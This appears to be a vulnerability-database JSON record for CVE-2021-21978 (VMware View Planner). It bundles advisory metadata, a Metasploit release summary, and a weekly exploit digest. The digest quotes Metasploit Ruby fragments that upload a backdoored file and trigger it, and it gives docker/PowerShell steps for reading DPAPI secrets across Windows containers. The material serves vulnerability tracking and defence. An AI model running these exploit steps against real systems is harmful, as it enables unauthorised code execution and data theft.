"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978"], "modified": "2021-03-02T00:00:00", "id": "VMSA-2021-0003", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0003.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T13:55:59", "description": "VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in logupload web application. An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted file leading to remote code execution within the logupload container.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T18:15:00", "type": "cve", "title": "CVE-2021-21978", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978"], "modified": "2021-03-26T19:59:00", "cpe": ["cpe:/a:vmware:view_planner:4.6"], "id": "CVE-2021-21978", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21978", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:view_planner:4.6:-:*:*:*:*:*:*"]}], "githubexploit": [{"lastseen": "2021-12-15T15:36:41", "description": "# CVE-2021-21978\nCVE-2021-21978 EXP\n\n# VMware View...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-05T04:33:19", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware View Planner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978"], "modified": "2021-12-15T14:41:35", "id": "0DF255CC-57A4-520A-B262-852C932A5B1A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-15T15:36:37", "description": "# CVE-2021-21978\nCVE-2021-21978 RCE exp\n\n\u5f71\u54cd\u7248\u672c\nVMware View Planne...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-05T03:58:33", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware View Planner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978"], "modified": "2021-12-15T14:41:35", "id": "3CA150A7-76FA-566E-A65C-9CE92B0C857A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-18T04:27:48", "description": "# CVE-2021-21978\n\u5e26\u56de\u663e\u7248\u672c\u7684\u6f0f\u6d1e\u5229\u7528\u811a\u672c\uff0c\u66f4\u7b80\u5355\u7684\u65b9\u5f0f\n\n## 0. \u6f0f\u6d1e\u4fe1\u606f\n>VMware View Pl...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-05T08:15:27", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware View Planner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978"], "modified": "2022-06-18T04:00:42", "id": "A5396B72-7F7D-5109-9A41-571016422FB5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-03T23:52:26", "description": "# CVE-2021-26855\nCVE-2021-26855 ssrf \u7b80\u5355\u5229\u7528\ngolang \u7ec3\u4e60\n\n## \u5f71\u54cd\u7248\u672c\nExc...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T08:39:05", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978", "CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-04-03T10:42:30", "id": "65D56BCD-234F-52E5-9388-7D1421B31B1B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-21T13:50:39", "description": "# CVE-2021-26855-PoC\nPoC exploit code for CVE-2021-26855. \n\nOrig...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T16:54:39", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-21978", "CVE-2021-26855"], "modified": "2022-02-21T12:12:08", "id": "F5339382-9321-5B96-934D-B803353CC9E3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "rapid7blog": [{"lastseen": "2021-03-26T18:52:42", "description": "## ProxyLogon\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/03/metasploit-blg-2-small-1.png)\n\nMore Microsoft news this week!\n\nFirstly, a big thank you to community contributors [GreyOrder](<https://github.com/GreyOrder>), [Orange Tsai](<https://github.com/orangetw>), and [mekhalleh](<https://github.com/mekhalleh>) (RAMELLA S\u00e9bastien), who added three new [modules](<https://github.com/rapid7/metasploit-framework/pull/14860>) that allow an attacker to bypass authentication and impersonate an administrative user ([CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>)) on vulnerable versions of Microsoft Exchange Server. By chaining this bug with another post-auth arbitrary-file-write vulnerability, code execution can be achieved on a vulnerable target ([CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065?referrer=blog>)), allwoing an unauthenticated attacker to execute arbitrary commands.\n\nThis vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010)\n\n## Advantech iView\n\nGreat work by our very own [wvu-r7](<https://github.com/wvu-r7>) and [zeroSteiner](<https://github.com/zeroSteiner>), who added a new exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14920>) for [CVE-2021-22652](<https://attackerkb.com/topics/A4sKN6BuXQ/cve-2021-22652?referrer=blog>).\n\nThis module exploits an unauthenticated configuration change vulnerability combined with an unauthenticated file write primitive, leading to an arbitrary file write that allows for remote code execution as the user running iView, which is typically NT AUTHORITY\\SYSTEM.\n\nThe exploit functions by first modifying the `EXPORTPATH` to be a writable path in the webroot. An export function is then leveraged to write JSP content into the previously configured path, which can then be requested to trigger the execution of an OS command within the context of the application. Once completed, the original configuration value is restored.\n\n## FortiLogger\n\nNice work by community contributor [erberkan](<https://github.com/erberkan>), who added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14830>) for [CVE-2021-3378](<https://attackerkb.com/topics/eTyHVvBtiM/cve-2021-3378?referrer=blog>).\n\nThis module exploits an arbitrary file upload via an unauthenticated POST request to the "/Config/SaveUploadedHotspotLogoFile" upload path for hotspot settings of FortiLogger 4.4.2.2.\n\nFortiLogger is a web-based logging and reporting software designed specifically for FortiGate firewalls, running on Windows operating systems. It contains features such as instant status tracking, logging, search / filtering, reporting and hotspot.\n\n## New Modules (7)\n\n * [Microsoft Exchange ProxyLogon](<https://github.com/rapid7/metasploit-framework/pull/14860>) by GreyOrder, Orange Tsai, and mekhalleh (RAMELLA S\u00e9bastien), which adds 3 modules that leverage two Microsoft Exchange Server vulnerabilities patched in March out-of-band security updates:\n\n * A scanner module that checks if the target is vulnerable to a Server-Side Request Forgery (SSRF) identified as [CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>).\n * An auxiliary module that dumps the mailboxes for a given email address, including emails, attachments and contact information. This module leverages the same SSRF vulnerability identified as [CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>).\n * An exploit module that exploits an unauthenticated Remote Code Execution on Microsoft Exchange Server. This allows execution of arbitrary commands as the SYSTEM user, leveraging the same SSRF vulnerability identified as [CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>) and also a post-auth arbitrary-file-write vulnerability identified as [CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065?referrer=blog>).\n * [VMware View Planner Unauthenticated Log File Upload RCE](<https://github.com/rapid7/metasploit-framework/pull/14875>) by wvu, Grant Willcox, and Mikhail Klyuchnikov, exploiting [CVE-2021-21978](<https://attackerkb.com/topics/84gfOVMN35/cve-2021-21978?referrer=blog>), an arbitrary file upload vulnerability within VMWare View Planner Harness prior to 4.6 Security Patch 1.\n\n * [Advantech iView Unauthenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14920>) by wvu and Spencer McIntyre, which exploits [CVE-2021-22652](<https://attackerkb.com/topics/A4sKN6BuXQ/cve-2021-22652?referrer=blog>), allowing an unauthenticated user to make configuration changes on a remote Advantech iView server. The vulnerability can be leveraged to obtain remote code execution within the context of the server application (which runs as SYSTEM by default).\n\n * [FortiLogger Arbitrary File Upload Exploit](<https://github.com/rapid7/metasploit-framework/pull/14830>) by Berkan Er, which exploits [CVE-2021-3378](<https://attackerkb.com/topics/eTyHVvBtiM/cve-2021-3378?referrer=blog>), an unauthenticated arbitrary file upload vulnerability in FortiLogger 4.4.2.2.\n\n * [Win32k ConsoleControl Offset Confusion](<https://github.com/rapid7/metasploit-framework/pull/14907>) by BITTER APT, JinQuan, KaLendsi, LiHao, MaDongZe, Spencer McIntyre, and TuXiaoYi, which exploits [CVE-2021-1732](<https://attackerkb.com/topics/7eGGM4Xknz/cve-2021-1732?referrer=blog>), an LPE vulnerability in win32k.\n\n## Enhancements and features\n\n * [#14878](<https://github.com/rapid7/metasploit-framework/pull/14878>) from [jmartin-r7](<https://github.com/jmartin-r7>) The recently introduced Zeitwerk loader is now wrapped and retained in a more flexible way. Additionally `lib/msf_autoload.rb` is now marked as a singleton class to ensure that only one instance of the loader can exist at any one time. The loading process has also been broken down into separate methods to allow for additional tweaking, extension, and suppression as needed.\n\n * [#14893](<https://github.com/rapid7/metasploit-framework/pull/14893>) from [archcloudlabs](<https://github.com/archcloudlabs>) `avast_memory_dump.rb` has been updated with additional paths to check for the `avdump.exe` utility, which should help Metasploit users in cases where the tool is bundled in with other Avast software besides the standard AV solution.\n\n * [#14917](<https://github.com/rapid7/metasploit-framework/pull/14917>) from [pingport80](<https://github.com/pingport80>) The `search` command has been updated to add in the `-s` and `-r` flags. The `-s` flag allows one to search by rank, disclosure date, module name, module type, or if the module implements a check method or not. The results will be ordered in ascending order, however users can show the results in descending order by using the `-r` flag.\n\n * [#14927](<https://github.com/rapid7/metasploit-framework/pull/14927>) from [pingport80](<https://github.com/pingport80>) The Ruby scripts under `tools/exploits/*` have been rewritten so that they capture signals and handle them gracefully instead of stack tracing.\n\n * [#14938](<https://github.com/rapid7/metasploit-framework/pull/14938>) from [adfoster-r7](<https://github.com/adfoster-r7>) The `time` command has been added to `msfconsole` to allow developers to time how long certain commands take to execute.\n\n## Bugs Fixed\n\n * [#14430](<https://github.com/rapid7/metasploit-framework/pull/14430>) from [cn-kali-team](<https://github.com/cn-kali-team>) Provides feedback to the user when attempting to use UUID tracking without a DB connection.\n\n * [#14815](<https://github.com/rapid7/metasploit-framework/pull/14815>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) Replaces deprecated uses of `::Rex:Socket.gethostbyname` in favor of the newer `::Rex::Socket.getaddress` functionality in preparation of Ruby 3 support.\n\n * [#14844](<https://github.com/rapid7/metasploit-framework/pull/14844>) from [dwelch-r7](<https://github.com/dwelch-r7>) This moves the on_session_open event until after the session has been bootstrapped which is necessary to expose some functionality required by plugins such as auto_add_route.\n\n * [#14879](<https://github.com/rapid7/metasploit-framework/pull/14879>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) The `ssh_login_pubkey.rb` module has been updated to support specifying the path to a private key for the `KEY_PATH` option, and to improve error handling in several places to reduce stack traces and make error messages are more understandable.\n\n * [#14896](<https://github.com/rapid7/metasploit-framework/pull/14896>) from [AlanFoster](<https://github.com/AlanFoster>) The `apache_activemq_upload_jsp` exploit has been updated so that it can successfully exploit vulnerable systems running Java 8. Additionally, module documentation has been added.\n\n * [#14910](<https://github.com/rapid7/metasploit-framework/pull/14910>) from [friedrico](<https://github.com/friedrico>) `filezilla_client_cred.rb` has been updated to prevent it from falsely identifying strings as being Base64 encoded when they are not. The new code now checks that the string is marked as being Base64 encoded before attempting to decode it.\n\n * [#14912](<https://github.com/rapid7/metasploit-framework/pull/14912>) from [bcoles](<https://github.com/bcoles>) The `netgear_r6700_pass_reset.rb` module has been updated to fix a typo that could occasionally cause the `check` function to fail, and to fix a stack trace caused by calling a method on a `nil` object.\n\n * [#14930](<https://github.com/rapid7/metasploit-framework/pull/14930>) from [adfoster-r7](<https://github.com/adfoster-r7>) This fixes a bug where the highlighting in msfconsole's search command would break when the search term was certain single letter queries.\n\n * [#14934](<https://github.com/rapid7/metasploit-framework/pull/14934>) from [timwr](<https://github.com/timwr>) A bug has been addressed whereby the `download` command in Meterpreter, if run on a directory containing UTF-8 characters, would result in an error. This has been resolved by enforcing the correct encoding.\n\n * [#14941](<https://github.com/rapid7/metasploit-framework/pull/14941>) from [dwelch-r7](<https://github.com/dwelch-r7>) The `smb_relay` module has been updated to force the use of `Rex::Proto::SMB::Client`, which fixes several issues that were being encountered due to the module accidentally using `ruby_smb` vs `Rex::Proto::SMB::Client`.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from\n\nGitHub:\n\n * [Pull Requests 6.0.36...6.0.37](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-03-18T09%3A30%3A28-05%3A00..2021-03-25T11%3A07%3A15-05%3A00%22>)\n * [Full diff 6.0.36...6.0.37](<https://github.com/rapid7/metasploit-framework/compare/6.0.36...6.0.37>) \nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest.\n\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-03-26T17:36:13", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1732", "CVE-2021-21978", "CVE-2021-22652", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-3378"], "modified": "2021-03-26T17:36:13", "id": "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C", "href": "https://blog.rapid7.com/2021/03/26/metasploit-wrap-up-104/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wallarmlab": [{"lastseen": "2021-08-19T16:35:42", "description": "Welcome to our weekly exploit digest! We should say this hasn't been a big week because guys keep producing exploits for the vulnerabilities discovered in the 1st half of March. Nevertheless, we have some new good arrivals for VMware, MS Windows and Win32 to talk about. \n\n### New 4+ scored exploits have arrived for 7 software titles:\n\n * VMware View Planner (v4.6)\n * Win32k ConsoleControl\n * Microsoft Exchange 2019\n * Microsoft Windows Containers DP API\n * SonLogger (v4.2.3.3)\n * LiveZilla Server (v8.0.1.0)\n * CuteNews (v2.1.2)\n\n### Here are the types of new exploiting tools:\n\nFile upload| 2 \n---|--- \nRCE| 1 \nOffset Confusion| 1 \nCryptography Flaw| 1 \nSSRF| 1 \nXSS| 1 \n \n## And the title winners of the week are: \n\n## ![treat menace vulnerability exploit](https://i1.wp.com/lab.wallarm.com/wp-content/uploads/2021/03/virus.png?resize=512%2C512&ssl=1)\n\n## I. The Vicious One\n\n### The title goes to this angry piece of code:\n\n[**VMware View Planner 4.6 Remote Code Execution**](<https://vulners.com/packetstorm/PACKETSTORM:161879>)\n\n[CVE-2021-21978](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21978>) \n**Score: CVSS 7.5** \n**Metasploit +**\n \n \n The versions of VMWare View Planner prior to 4.6 Security Patch 1 contain a remote code execution vulnerability (RCE). \n\nThis module exploits an unauthenticated log file upload within the `log_upload_wsgi.py` file, where an unauthorized attacker with network access to View Planner Harness could upload and execute an arbitrary file in the `logupload` web application.\n \n \n def upload_file(content) \n mime = Rex::MIME::Message.new \n mime.add_part(content, 'application/octet-stream', nil, \"form-data; name=\\\"logfile\\\";filename=\\\"#{Rex::Text.rand_text_alpha(20)}\\\"\") \n mime.add_part('{\"itrLogPath\":\"/etc/http/html/wsgi_log_upload\",\"logFileType\":\"log_upload_wsgi.py\"}', nil, nil, 'form-data; name=\"logMetaData\"') \n res = send_request_cgi( \n 'method' => 'POST', \n 'uri' => normalize_uri(target_uri.path, 'logupload'), \n 'ctype' => \"multipart/form-data; boundary=#{mime.bound}\", \n 'data' => mime.to_s \n ) \n ...\n \n\nSuccessful exploitation of this vulnerability can result in RCE as the apache user inside the `apacheServer` Docker container. Let's look how it's realized.\n\nFirst grab the template file from a clean install with a backdoor section added to it. Then fill in the PAYLOAD placeholder with the payload to execute. \n \n \n data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname) \n file_content = File.read(File.join(data_dir, 'log_upload_wsgi.py')) payload.encoded.gsub!(/\"/, '\\\\\"')\n file_content['PAYLOAD'] = payload.encoded \n\nWhen the things are primed, upload the file to the target.\n \n \n print_status('Uploading backdoor to system via the arbitrary file upload vulnerability!')\n upload_file(file_content)\n print_good('Backdoor uploaded!')\n\nThen use the `OPTIONS` request to trigger the backdoor. Technically this could be any other HTTP method including invalid ones like `BACKDOOR`, but for the stealth you better use a legit one. \n \n \n send_request_cgi( 'method' => 'OPTIONS', 'uri' => normalize_uri(target_uri.path, 'logupload') ) ...\n\n### The second place in this category goes here: \n\n[**Win32k ConsoleControl Offset Confusion**](<https://vulners.com/packetstorm/PACKETSTORM:161880>)\n\n[CVE-2021-1732](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1732>),[CVE-2016-7255](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255>) \n**Score: CVSS 7.2 \nMetasploit +**\n \n \n A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\\SYSTEM. \n\nThe flaw exists in how the `WndExtra` field of a window can be manipulated into being treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to achieve an out of bounds write operation, eventually leading to privilege escalation. \n\n* * *\n\n## ![treat menace vulnerability exploit](https://i0.wp.com/lab.wallarm.com/wp-content/uploads/2021/03/coding.png?resize=512%2C512&ssl=1)\n\n## II. The Geek of the Week\n\nIn our not so humble opinion, this one is the coolest thing we saw last week. It is all about Windows Docker Information Disclosure Vulnerability, and since we love our Docker containers, so\n\n### The title goes to this exploit:\n\n[**Microsoft Windows Containers DP API Cryptography Flaw**](<https://vulners.com/packetstorm/PACKETSTORM:161816>)\n\n[CVE-2021-1645](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1645>) \n**Score: CVSS 6.1 \nMetasploit +**\n \n \n The Windows Data Protection API (DP API) allows applications to encrypt arbitrary data without managing keys. You can pass any data to the API, and it then returns an encrypted blob, or you can reverse an encrypted blob with DP API to recover the plain text. The cryptographic key used is either tied to the user context or is unique to a machine. There was a design issue with DP API in containers which resulted in DP API using the same key in all Windows containers. Additionally, these keys were public in base-image layers published by Microsoft.\n\nThe above vulnerability applies to both user- and machine-key DP API encryption within Windows Docker containers, we used the machine key encryption in our explanations. Typically, a machine key is tied to a (virtual-)machine. Therefore, a machine is not capable of decrypting data encrypted by an application on another device. However, due to a design matter, DP API machine keys used in containers came from the container images. Since Windows Docker images are based on identical base images, the containers\u2019 DP API keys were the same. As long as the base image is public, the DP API keys were public also.\n\nTherefore, DP API operations performed by any Windows container application were ineffective, as the encryption key that was used is public. That is why organizations that used DP API in Windows Docker containers and relied on it to store encrypted data are in a potentially insecure location and should consider this data as compromised.\n\nLets' see how to make this exploit work. First, start a docker container called Alice on VM1:\n \n \n \\$ docker run --name Alice -it mcr.microsoft.com/dotnet/framework/runtime:4.8-windowsservercore-ltsc2019 cmd.exe\n\nThen, encrypt a file in the Alice container using the powershell script `vault.ps1`: \n \n \n C:\\>powershell.exe -File vault.ps1 -StoreSecret \"This is my secret text\" secret.txt\n C:\\>type secret.txt AQAAA...vJ8aUP9 \n\nStart a docker container Bob on VM2:\n \n \n \\$ docker run --name Bob -it mcr.microsoft.com/dotnet/framework/runtime:4.8-windowsservercore-ltsc2019 cmd.exe\n\nThe next command shows that the file encrypted by Alice on VM1 can be decrypted in the Bob container on VM2:\n \n \n C:\\>powershell.exe -File vault.ps1 secret.txt This is my secret text\n\nNext use the `vault.ps1` PowerShell script from <https://blag.nullteilerfrei.de/2018/01/05/powershell-dpapi-script/>.\n\n* * *\n\n## Other hi-scored exploits published this week: \n\n[**SonLogger 4.2.3.3 Shell Upload (Unauthenticated Arbitrary File Upload)**](<https://vulners.com/packetstorm/PACKETSTORM:161793>)\n\n[CVE-2021-27964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27964>) \n**Score: CVSS 7.5 \nMetasploit +**\n \n \n This module exploits an unauthenticated arbitrary file upload via insecure POST request.\n\n**[Microsoft Exchange 2019 SSRF / Arbitrary File Write](<https://vulners.com/packetstorm/PACKETSTORM:161846>)**\n\n[CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>) \n**Score: 7.5**\n \n \n This one exploits an SSRF vulnerability in Exchange that allows privileged access to Exchange\u2019s backend resources - one of the four zero-day vulnerabilities in MS Exchange discovered in March.\n\n[**CuteNews 2.1.2 Shell Upload**](<https://vulners.com/packetstorm/PACKETSTORM:161833>)\n\n[CVE-2019-11447](<https://vulners.com/cve/CVE-2019-11447>) \n**Score: CVSS 6.5**\n \n \n An attacker can infiltrate the server through the avatar upload process in the profile area via the avatar_file field to index.php?mod=main&opt=personal.\n\n[**LiveZilla Server 8.0.1.0 Cross Site Scripting**](<https://vulners.com/packetstorm/PACKETSTORM:161867>)\n\n[CVE-2019-12962](<https://vulners.com/cve/CVE-2019-12962>) \n**Score: CVSS 4.3**\n \n \n LiveZilla Server before 8.0.1.1 is vulnerable to XSS in mobile/index.php via the Accept-Language HTTP header.\n\nThe post [Weekly exploit digest - March, 15-21 - VMware View Planner, Win32k ConsoleControl, Microsoft Windows Containers DP API](<https://lab.wallarm.com/exploit-digest-march-15-21-vulnerabilities-vmware-win32k-windows-containers/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-21T13:09:00", "type": "wallarmlab", "title": "Weekly exploit digest \u2013 March, 15-21 \u2013 VMware View Planner, Win32k ConsoleControl, Microsoft Windows Containers DP API", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2019-11447", "CVE-2019-12962", "CVE-2021-1645", "CVE-2021-1732", "CVE-2021-21978", "CVE-2021-26855", "CVE-2021-27964"], "modified": "2021-03-21T13:09:00", 